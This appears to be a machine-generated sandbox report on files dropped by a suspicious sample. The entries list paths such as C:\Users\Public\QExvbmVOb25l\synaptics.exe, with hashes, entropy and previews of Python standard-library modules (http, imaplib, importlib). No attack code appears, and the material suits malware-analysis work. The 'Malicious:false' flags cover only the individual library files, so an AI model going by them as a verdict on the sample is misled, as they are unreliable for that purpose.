                                                                                                                                                                                      SHA1:90257407964B7D68CF8A6A35C54493564324C529
                                                                                                                                                                                      SHA-256:0BF12E11CD0F2183FF38ED57C4703533A7F160E6D81A9C30028F4436DA80C77F
                                                                                                                                                                                      SHA-512:C2D8841F6BB8F17BA4730FB90DC303CBDA3013ED4885318F51A70373AFAC52BB4C1F1510787CD594CC4A4C1531EF37A6F37C62260C8D9A09D5C25D4DED46490D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sP...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.....e.j.j.....d.d...e.j.j.....D...Z.d.Z.d.Z.e...d...j.Z.e...d...j Z!e...d...Z"e...d...Z#h.d...Z$d?d.d...Z%G.d.d...d.e.j&j'..Z(d.d...Z)e(f.d.d...Z*G.d.d...d.e.j+..Z,G.d.d ..d ..Z-z.d.d.l.Z.W.n...e/y.......Y.n.w.G.d!d"..d"e-..Z0e..1d"....G.d#d$..d$e2..Z3G.d%d&..d&e3..Z4G.d'd(..d(e3..Z5G.d)d*..d*e3..Z6G.d+d,..d,e3..Z7G.d-d...d.e3..Z8G.d/d0..d0e3..Z9G.d1d2..d2e3..Z:G.d3d4..d4e:..Z;G.d5d6..d6e:..Z<G.d7d8..d8e:..Z=G.d9d:..d:e3..Z>G.d;d<..d<e3..Z?G.d=d>..d>e@e>..ZAe3ZBd.S.)@a....HTTP/1.1 client library..<intro stuff goes here>.<other stuff, too>..HTTPConnection goes through a number of "states", which define when a client.may legally make another request or fetch the response for a particular.request. This diagram details these state transitions:.. (null). |. | HTTPConnection(). v. Idle. |. | putr
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):53453
                                                                                                                                                                                      Entropy (8bit):5.564343561169894
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:6BX5TRGXx0wM1oyXc63+Rb+TXzpTrY/hgRkOfmXULJn0MFgddqRGfUehMJutkvPK:KAI1FXZ+R+ZyhXd6x8MMT
                                                                                                                                                                                      MD5:9E81CB93637CA078C9B5090E8B051358
                                                                                                                                                                                      SHA1:02580005C089ACAEABE364E3B6C36073059AF6A8
                                                                                                                                                                                      SHA-256:7AF976BB29C3713F9DF340D7F5710D4EEF1C30EF3B9E6E64D113C12F4A0F2A65
                                                                                                                                                                                      SHA-512:657FAF2A1121778BABD740F719D3C35B2F380AACEBBAC8F3A73AF4C457F4760286F7B8ED4900B64ECFCE22CFE574DEA4BEF35084231713BE4DA45C947F893EF6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15351
                                                                                                                                                                                      Entropy (8bit):5.447784818916672
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:LC6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:mWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                      MD5:257E60F28A4B45F5578C837D741100F3
                                                                                                                                                                                      SHA1:5680CAFF01297BDB33F64E1783B059A3885B3E3A
                                                                                                                                                                                      SHA-256:AF62D676940D567654BB2472ACEE702F1A384DDC19F80C776351EECEFA9775D9
                                                                                                                                                                                      SHA-512:D9B4CC8BB2A5B773005F6E1499071D3F39C5D3B403A338B37AA7833313C311EE3F46752DD9C21E142220BA3D90C28AF30E23C05249992351CD52365D87DB15E7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):58321
                                                                                                                                                                                      Entropy (8bit):4.406436591744728
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:l3z+32B5SQi1oScyNzBooOSlNcVkACLogKRkRAW5U:l3z+32B5SQi1oScyNzBooOSl4CLoRkRM
                                                                                                                                                                                      MD5:5D6BFC608ECF70840D6DE2795FD69F1F
                                                                                                                                                                                      SHA1:17F160F07B156F498D251E189408CBFC5730EA86
                                                                                                                                                                                      SHA-256:1E627D49863719FE81EEC9EC3CE3A11263E24848F7F9A0DC01DF515971E6ACF5
                                                                                                                                                                                      SHA-512:AB562C2CB8243109F74C44AD157EA470181581114D42907F76B89B65B7CAAD745B6C0EF39F91AAA02146F1E67C68A244FFFDC0B00E83405A34060E4F84DD0655
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""HTTP/1.1 client library....<intro stuff goes here>..<other stuff, too>....HTTPConnection goes through a number of "states", which define when a client..may legally make another request or fetch the response for a particular..request. This diagram details these state transitions:.... (null).. |.. | HTTPConnection().. v.. Idle.. |.. | putrequest().. v.. Request-started.. |.. | ( putheader() )* endheaders().. v.. Request-sent.. |\_____________________________.. | | getresponse() raises.. | response = getresponse() | ConnectionError.. v v.. Unread-response Idle.. [Response-headers-read].. |\____________________.. | |.. | response.read() | putrequest().. v v.. Idle Req-started-unread-response.. ______/|.. /
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):79540
                                                                                                                                                                                      Entropy (8bit):4.458584258215225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:Gsf5OCLTKr88g99gZ5m2SLbzf7bbV2VwRyx67wF:G037jgZ5YD/I6Rs6UF
                                                                                                                                                                                      MD5:C1F3927D2E339DE399959A069F045EC6
                                                                                                                                                                                      SHA1:B70C655321DBD6F9D95342962FFE39BDA26CCBAF
                                                                                                                                                                                      SHA-256:55A941BAB49900DC61701C80397554F2F79BF235A26D75DCFF96D20278097D87
                                                                                                                                                                                      SHA-512:548E40EB51392C99C16A241A12CDBBDD0C4697BC1A4CEF3F6E7AF7BCB966AD41D6EE88E899A9C86735246CDEC569A4155362E4D614E0925921097928EE9A3978
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:r"""HTTP cookie handling for web clients.....This module has (now fairly distant) origins in Gisle Aas' Perl module..HTTP::Cookies, from the libwww-perl library.....Docstrings, comments and debug strings in this code refer to the..attributes of the HTTP cookie system as cookie-attributes, to distinguish..them clearly from Python attributes.....Class diagram (note that BSDDBCookieJar and the MSIE* classes are not..distributed with the Python standard library, but are available from..http://wwwsearch.sf.net/):.... CookieJar____.. / \ \.. FileCookieJar \ \.. / | \ \ \.. MozillaCookieJar | LWPCookieJar \ \.. | | \.. | ---MSIEBase | \.. | / | | \.. | / MSIEDBCookieJar BSDDBCookieJar.. |/.. MSIECookieJar...."""....__all__ = ['Cookie', 'Cook
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21094
                                                                                                                                                                                      Entropy (8bit):4.737928355464598
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:ShNUZtUx0dqJ1sJxttmT+tOVVyeuPFcLIcfOuu7jvxyXWNYN:ShNUZmx0dCsNPFGIcfyM+YN
                                                                                                                                                                                      MD5:BB19E50B174A51A5972C7DFD8F142ADB
                                                                                                                                                                                      SHA1:FE6E9FB17F72042FF2EF00FC6E7F5C51631D2F3C
                                                                                                                                                                                      SHA-256:D049D9DE921DD9A2D13CD205FC0ABED14691CDDC8BA6F3C174653AF938ECD79F
                                                                                                                                                                                      SHA-512:993B3238D231137B5E703FC4ADC0FD2A263A6EB7D07FDBFCA11DEEC422184A99C8ABAD6F2CE8F6A36C253D5967BAE8BA921261C636BE4F4B4A3B7D22A05EB27A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:####..# Copyright 2000 by Timothy O'Malley <timo@alum.mit.edu>..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software..# and its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Timothy O'Malley not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS..# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY..# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR..# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,..# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS..# ACTION, ARISING
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):49514
                                                                                                                                                                                      Entropy (8bit):4.578488993320622
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:lfngUjS+gSOsV6f0aKucGIEgA0Bw4ETVp5tU6N0YO:lvgUjS+7OsVQ0aKucGIEOBuTZN0YO
                                                                                                                                                                                      MD5:A0E7352D69843F9F999D3EC06678E1B4
                                                                                                                                                                                      SHA1:7FF7AFC9FB2D5B14A6FDC80882642092F472EE90
                                                                                                                                                                                      SHA-256:C97B4D93BF1BB9DD82916677A95EF73AA8E73374E3EB9244F2E8560410965AE4
                                                                                                                                                                                      SHA-512:41729951BAE2E77B3EA235B54A9A1F21792F6D202E4A658D894CE8E6AB063B3AD4D9824D0EE1CC94A0F826808E197E1E2E1BE48308AB504E8EEB97B9AB474E9D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""HTTP server classes.....Note: BaseHTTPRequestHandler doesn't implement any HTTP request; see..SimpleHTTPRequestHandler for simple implementations of GET, HEAD and POST,..and CGIHTTPRequestHandler for CGI scripts.....It does, however, optionally implement HTTP/1.1 persistent connections,..as of version 0.3.....Notes on CGIHTTPRequestHandler..------------------------------....This class implements GET and POST requests to cgi-bin scripts.....If the os.fork() function is not present (e.g. on Windows),..subprocess.Popen() is used as a fallback, with slightly altered semantics.....In all cases, the implementation is intentionally naive -- all..requests are executed synchronously.....SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL..-- it may execute arbitrary Python code or external programs.....Note that status code 200 is sent prior to execution of a CGI script, so..scripts cannot send other status codes such as 302 (redirect).....XXX To do:....- log requests even
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):56515
                                                                                                                                                                                      Entropy (8bit):4.687424781884806
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:LxnlDvnsQeIBol2eKsBKOgE1IFWv4wem8YCY17JTBY:L9lbsQ5el2eKs4OgE1IFwDem8YN5Ri
                                                                                                                                                                                      MD5:F26881E2906384DBE388BAFCC0A32393
                                                                                                                                                                                      SHA1:9246F7D6A4DAD4FF9EA4BE73209A63A2B17CC2D3
                                                                                                                                                                                      SHA-256:76B464DD9B86B5546E228A310B57C848F8B58533FDFBD19A95F55381192CA508
                                                                                                                                                                                      SHA-512:2D45809961FDA91A0D7A9F2294FC0F865A05589FF2910C54B7A714175FB09DCAA5B760641F48520B11FDF3DEBDF992CE56873537B61EC826F4623FAF4A33D08B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""IMAP4 client.....Based on RFC 2060.....Public class: IMAP4..Public variable: Debug..Public functions: Internaldate2tuple.. Int2AP.. ParseFlags.. Time2Internaldate.."""....# Author: Piers Lauder <piers@cs.su.oz.au> December 1997...#..# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998...# String method conversion by ESR, February 2001...# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001...# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002...# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002...# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002...# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.....__version__ = "2.58"....import binascii, errno, random, re, socket, subprocess, sys, time, calendar..from datetime import datetime, timezone, tim
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3976
                                                                                                                                                                                      Entropy (8bit):4.730395972681575
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:MwbIH3M4Hmme6v5At+TXksO2E2+kqaQG6q8GjHjKkz:MRDcaKs/QCpjHjKkz
                                                                                                                                                                                      MD5:DFFC1936F5CECC4DD8901EA2B924BA1D
                                                                                                                                                                                      SHA1:7A09F45AE6DE63DABFD951C904ACBD1BB6316D76
                                                                                                                                                                                      SHA-256:E01288F17006090085CE2CEFB5C8CE94BF0E7D441EEC70BA57BD70034C886899
                                                                                                                                                                                      SHA-512:2F826D923DD26CB58EAD8F2CB7D56B7C3317D59EF0CDA51C8BA0B126DE39946286F75978249150F3828C088C5A01F605895081262A90A6DD51B763B2C34AFBE2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Recognize image file formats based on their first few bytes."""....from os import PathLike....__all__ = ["what"]....#-------------------------#..# Recognize image headers #..#-------------------------#....def what(file, h=None):.. f = None.. try:.. if h is None:.. if isinstance(file, (str, PathLike)):.. f = open(file, 'rb').. h = f.read(32).. else:.. location = file.tell().. h = file.read(32).. file.seek(location).. for tf in tests:.. res = tf(h, f).. if res:.. return res.. finally:.. if f: f.close().. return None......#---------------------------------#..# Subroutines per image file type #..#---------------------------------#....tests = []....def test_jpeg(h, f):.. """JPEG data in JFIF or Exif format""".. if h[6:10] in (b'JFIF', b'Exif'):.. return 'jpeg'....tests.append(test_jpeg)....def test_png(h, f):..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10937
                                                                                                                                                                                      Entropy (8bit):4.78644206171614
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:w7D45FhQzMd3kVK+bhhVA02690t/93v5lGbqRDnZfOmSdF2p:wg+WkVK+lhVAuU9xlGuR1nW2p
                                                                                                                                                                                      MD5:B961B5EA8D2A81594CB59270C55A9412
                                                                                                                                                                                      SHA1:68C059B59A0FB1E697F56DE9894842E07EF549DB
                                                                                                                                                                                      SHA-256:22455CCD2ECA0C0F032603FCEF28684DF795450E402C1E98AC8039AC9E6CA5E6
                                                                                                                                                                                      SHA-512:6B04010B64BA3232CE1401DEA03FA97E12E374D168EA9F1E441B60D532F45B53D56814AC73EB78B0AE32C0F2CAAF0E2CDA802A8FF10E28D7EAA73CFAA6220874
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""This module provides the components needed to build your own __import__..function. Undocumented functions are obsolete.....In most cases it is preferred you consider using the importlib module's..functionality over this module....."""..# (Probably) need to stay in _imp..from _imp import (lock_held, acquire_lock, release_lock,.. get_frozen_object, is_frozen_package,.. init_frozen, is_builtin, is_frozen,.. _fix_co_filename)..try:.. from _imp import create_dynamic..except ImportError:.. # Platform doesn't support dynamic loading... create_dynamic = None....from importlib._bootstrap import _ERR_MSG, _exec, _load, _builtin_from_name..from importlib._bootstrap_external import SourcelessFileLoader....from importlib import machinery..from importlib import util..import importlib..import os..import sys..import tokenize..import types..import warnings....warnings.warn("the imp module is deprecated in favour of importlib and slated "..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6265
                                                                                                                                                                                      Entropy (8bit):4.606670655660399
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:4tH2fRvVSnhV4kSSNOyKGk+SNplpIZvYZwPbBbrx5To141x41YLat9RH++3mTWtj:glz4vSNGGXSNV4bRrqs41Jt9RJmCt/hV
                                                                                                                                                                                      MD5:DBE317F92FE33213AA2410A2479B9C54
                                                                                                                                                                                      SHA1:29DDC88364C936E2D4FF3EA9B14F2176AC6A4230
                                                                                                                                                                                      SHA-256:6D4AB4726790393388B483A56966276861EB3353731646572774FFA90B68289E
                                                                                                                                                                                      SHA-512:07D0E99B5CFA1608E74279B5FF5E03D49B714C5B78F2B4FB3839CBE9A3133FE076650BF2C490736F7D88BB3584701F5931D9BB457C3A618AEA5C8DDEA3112431
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A pure Python implementation of import."""..__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']....# Bootstrap help #####################################################....# Until bootstrapping is complete, DO NOT import any modules that attempt..# to import importlib._bootstrap (directly or indirectly). Since this..# partially initialised package would be present in sys.modules, those..# modules would get an uninitialised copy of the source version, instead..# of a fully initialised version (either the frozen one or the one..# initialised below if the frozen one is not available)...import _imp # Just the builtin component, NOT the full Python module..import sys....try:.. import _frozen_importlib as _bootstrap..except ImportError:.. from . import _bootstrap.. _bootstrap._setup(sys, _imp)..else:.. # importlib._bootstrap is the built-in import, ensure we don't create.. # a second copy of the module... _bootstrap.__name__ = 'importlib._bootstrap
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3818
                                                                                                                                                                                      Entropy (8bit):5.547983903948432
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:6uKEn4Gs1xwkB8RpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:QEk6oMK1a0j+DmF2QZIh
                                                                                                                                                                                      MD5:FF1EAD2607B111C4B06B0E965F5C8C2A
                                                                                                                                                                                      SHA1:1583368549A4421C080989F90C15D2140E6CACD1
                                                                                                                                                                                      SHA-256:6E7D6B15FFEA62BFFB6C5888D2428C3EA6536B8BABC31AC698321076666B37E6
                                                                                                                                                                                      SHA-512:B3D48741B95FA23AAB5CC329C679F401716E3E4C75D14C48A648C6227E7FACD45EA49CF90884B6F275E069FFF0A7C791B15416A5F397F051E0B0B9492C770B04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....6C:\Users\Public\QExvbmVOb25l\lib\importlib\__init__.pyr....A...s..............r....c....................C...s.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1984
                                                                                                                                                                                      Entropy (8bit):5.0264178323697895
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:eGYO7KXEXsUXrqj9FXHRLSVRibTAsKhnsRyy:MrEXxXrqhFXHPTbIsZ
                                                                                                                                                                                      MD5:2DB1553B7AE96769454D9D400C48AD48
                                                                                                                                                                                      SHA1:60BD75D3937F08AADAD444DCFF8DAFE0D30BAAFD
                                                                                                                                                                                      SHA-256:026487F41E4A286B91882F0C9EDF3BCF50D1FA30AD4E4FB7AFD7AACF9673BC74
                                                                                                                                                                                      SHA-512:3FBE631210C0C7A039D4217676CEF3D6AEF15EDE1124A1973B5F29C518A91FCF3E6A767F2322586E33B4C5FEBE3C37CEA1840728DEF07AE53B2EA50A3D0125F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....2C:\Users\Public\QExvbmVOb25l\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3716
                                                                                                                                                                                      Entropy (8bit):4.669556921717515
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:udiPhyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:bhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                      MD5:36AD21764FD68E2A00257A3FBA2867BF
                                                                                                                                                                                      SHA1:606CBE4365409C5ACE4D6CC4C9F51ABD3B7E14DC
                                                                                                                                                                                      SHA-256:898956976FE8AAA0CD0C13D51D35C731E8D8D9508824070921FB589B9EE87100
                                                                                                                                                                                      SHA-512:1349DC1FF11154372A1BE550EF78802B1B0BEB968FBD5D820473EE955A8318589A659341C15F8A8E03507FCFCC4896F1D5809D415EC344087D0ECBD4A736F633
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....7C:\Users\Public\QExvbmVOb25l\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2980
                                                                                                                                                                                      Entropy (8bit):5.201595793085135
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MfiZ38jH+kP4PY+IewYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:MfipsH3ARwYali7ZL7dillY2s033mm2v
                                                                                                                                                                                      MD5:EBF28ACC37484D41F7D7EE700F89BCBC
                                                                                                                                                                                      SHA1:A38B160A3D94A83EC79F89ACA3B085768D239117
                                                                                                                                                                                      SHA-256:5CDDAC3F6C6C0BCDD8DF2934703AF86BEA1B116B9FF47A108AF28C63D61673D0
                                                                                                                                                                                      SHA-512:77086CCB56DFAF54ED58CFA240C1C786E542FBB1F736967BFE96F978B0A9BDFD5B014BBE972CDD54639DA7ACE1701D24B967EEE262675F85673C5641A672EA12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
